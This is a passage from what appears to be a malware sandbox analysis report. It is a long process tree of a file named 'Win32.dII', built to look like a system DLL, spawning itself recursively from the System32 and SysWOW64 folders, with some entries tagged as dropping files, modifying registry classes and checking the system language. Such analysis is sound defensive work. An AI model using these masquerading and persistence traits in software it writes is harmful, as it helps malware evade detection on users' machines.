        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        120⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        121⤵
        Drops file in System32 directory
        
        PID:2308
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        122⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        123⤵
        System Location Discovery: System Language Discovery
        
        PID:2520
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        124⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        125⤵
        Drops file in System32 directory
        
        PID:1064
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        126⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        127⤵
        
        PID:264
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        128⤵
        System Location Discovery: System Language Discovery
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        129⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:2644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        130⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2264
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        131⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        132⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        133⤵
        System Location Discovery: System Language Discovery
        
        PID:1112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        134⤵
        Modifies registry class
        
        PID:2132
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        135⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        136⤵
        Drops file in System32 directory
        
        PID:2960
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        137⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        138⤵
        
        PID:704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        139⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1792
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        140⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        141⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        142⤵
        System Location Discovery: System Language Discovery
        
        PID:964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        143⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        144⤵
        Drops file in System32 directory
        
        PID:596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        145⤵
        System Location Discovery: System Language Discovery
        
        PID:1708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        146⤵
        Drops file in System32 directory
        
        PID:3036
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        147⤵
        System Location Discovery: System Language Discovery
        
        PID:2412
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        148⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        149⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        150⤵
        
        PID:776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        151⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        152⤵
        Modifies registry class
        
        PID:1100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        153⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1052
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        154⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        155⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        156⤵
        Drops file in System32 directory
        
        PID:304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        157⤵
        Drops file in System32 directory
        
        PID:2980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        158⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:3000
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        159⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        160⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        161⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        162⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        163⤵
        Drops file in System32 directory
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        164⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        165⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        166⤵
        Drops file in System32 directory
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        167⤵
        Drops file in System32 directory
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        168⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        169⤵
        Modifies registry class
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        170⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        171⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        172⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        173⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        174⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        175⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        176⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        177⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        178⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        179⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        180⤵
        
        PID:316
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        181⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        182⤵
        
        PID:340
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        183⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        184⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        185⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        186⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        187⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        188⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        189⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        190⤵
        
        PID:708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        191⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        192⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        193⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        194⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        195⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        196⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        197⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        198⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        199⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        200⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        201⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        202⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        203⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        204⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        205⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        206⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        207⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        208⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        209⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        210⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        211⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        212⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        213⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        214⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        215⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        216⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        217⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        218⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        219⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        220⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        221⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        222⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        223⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        224⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        225⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        226⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        227⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        228⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        229⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        230⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        231⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        232⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        233⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        234⤵
        
        PID:560
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        235⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        236⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        237⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        238⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        239⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        240⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        241⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        242⤵
        
        PID:852
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        243⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        244⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        245⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        246⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        247⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        248⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        249⤵
        
        PID:768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        250⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        251⤵
        
        PID:564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        252⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        253⤵
        
        PID:316
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        254⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        255⤵
        
        PID:340
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        256⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        257⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        258⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        259⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        260⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        261⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        262⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        263⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        264⤵
        
        PID:708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        265⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        266⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        267⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        268⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        269⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        270⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        271⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        272⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        273⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        274⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        275⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        276⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        277⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        278⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        279⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        280⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        281⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        282⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        283⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        284⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        285⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        286⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        287⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        288⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        289⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        290⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        291⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        292⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        293⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        294⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        295⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        296⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        297⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        298⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        299⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        300⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        301⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        302⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        303⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        304⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        305⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        306⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        307⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        308⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        309⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        310⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        311⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        312⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        313⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        314⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        315⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        316⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        317⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        318⤵
        
        PID:560
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        319⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        320⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        321⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        322⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        323⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        324⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        325⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        326⤵
        
        PID:852
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        327⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        328⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        329⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        330⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        331⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        332⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        333⤵
        
        PID:768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        334⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        335⤵
        
        PID:564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        336⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        337⤵
        
        PID:316
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        338⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        339⤵
        
        PID:340
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        340⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        341⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        342⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        343⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        344⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        345⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        346⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        347⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        348⤵
        
        PID:708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        349⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        350⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        351⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        352⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        353⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        354⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        355⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        356⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        357⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        358⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        359⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        360⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        361⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        362⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        363⤵
        
        PID:1644
        
